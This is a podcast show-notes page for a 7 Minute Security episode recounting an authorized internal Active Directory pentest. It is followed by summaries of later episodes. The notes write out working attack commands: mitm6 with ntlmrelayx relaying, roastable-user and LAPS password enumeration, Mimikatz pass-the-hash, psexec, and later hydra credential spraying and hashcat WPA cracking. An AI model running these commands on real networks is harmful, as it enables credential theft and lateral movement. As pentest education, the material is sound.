7MS #455: Tales of Internal Network Pentest Pwnage - Part 24
7 Minute Security19 Feb 2021

7MS #455: Tales of Internal Network Pentest Pwnage - Part 24

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

  • I got to use some of my new CRTP skills!

  • Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:

Get-DomainUser -PreauthNotRequired

  • Check for misconfigured LAPS installs with Get-LAPSPasswords!

  • The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn +
    ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!

  • When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!

  • SharpShares is a cool way to find shares your account has access to.

  • I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information

  • Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:

sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com

Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!

  • Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!

  • Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

Avsnitt(704)

7MS #600: First Impressions of Using AI on Penetration Tests

7MS #600: First Impressions of Using AI on Penetration Tests

Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox. Will AI replace pentesters as we know them today? In my humble opinion: not quite yet. Check out today's episode to hear more, and please join me on Wednesday, December 6 for my Webinar on this topic with Netwrix called Hack the Hackers: Exploring ChatGPT and PentestGPT in Penetration Testing!

1 Dec 202322min

7MS #599: Baby's First Responsible Disclosure

7MS #599: Baby's First Responsible Disclosure

Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes the use of: BulletsPassView MITMsmtp mitmproxy

25 Nov 202338min

7MS #598: Hacking Billy Madison - Part 4

7MS #598: Hacking Billy Madison - Part 4

Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2 and 3). In today's final chapter, Paul and I: Find Eric's secret SSH back door Locate and decrypt a hidden file with Billy's homework Build wordlists with cewl Save Billy from the evil clutches of Eric Gordon!!!

17 Nov 202324min

7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy

7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy

Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy)! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much more! From a pentesting POV, you can whip up an Android pentesting environment, BloodHound/SharpHound combo, Burp Suite...the list goes on!

11 Nov 202332min

7MS #596: How to Succeed in Business Without Really Crying - Part 13

7MS #596: How to Succeed in Business Without Really Crying - Part 13

After about a year break (last edition of this series was in October, 2022, we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover: Why we're not planning on selling the business any time soon Fast Google Dorks Scan Using ProtonVPN via command line Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of

4 Nov 202331min

7MS #595: Choosing the Right XDR Strategy with Matt Warner of Blumira

7MS #595: Choosing the Right XDR Strategy with Matt Warner of Blumira

Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507?) to talk about choosing the right XDR strategy! There's a lot to unpack here. Are EDR, MDR and XDR related? Can you get them all from one vendor - and should you? Do you run them on-prem, in the cloud, or both? Join us as Matt answers these questions and more!

31 Okt 20231h 3min

7MS #594: Using PatchMyPC to Auto-Update Pentest Dropboxes

7MS #594: Using PatchMyPC to Auto-Update Pentest Dropboxes

Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!

23 Okt 202329min

7MS #593: Hacking Billy Madison - Part 3

7MS #593: Hacking Billy Madison - Part 3

Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff: Port knocking is awesome using utilities like knock: /opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986 Sending emails via command line is made (fairly) easy with swaks: swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" You could also use telnet and do this command by command - see this article from Black Hills Information Security for more info. Hyda works good for spraying FTP creds: hydra -l user -P passlist.txt ftp://192.168.0.1 Check out my quick cheat sheet about bettercap (see episode #522) for some syntax on extracting WPA handshake data from cap files: # ...it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat: sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap # Then crack with hashcat! sudo /path/to/hashcat -m22000 readytocrack.hc2000 wordlist.txt

15 Okt 202338min

Populärt inom Politik & nyheter

svenska-fall
aftonbladet-krim
motiv
p3-krim
fordomspodden
rss-krimstad
rss-viva-fotboll
flashback-forever
blenda-2
aftonbladet-daily
rss-sanning-konsekvens
rss-frandfors-horna
rss-vad-fan-hande
rss-krimreportrarna
dagens-eko
olyckan-inifran
krimmagasinet
grans
rss-flodet
della-monde-2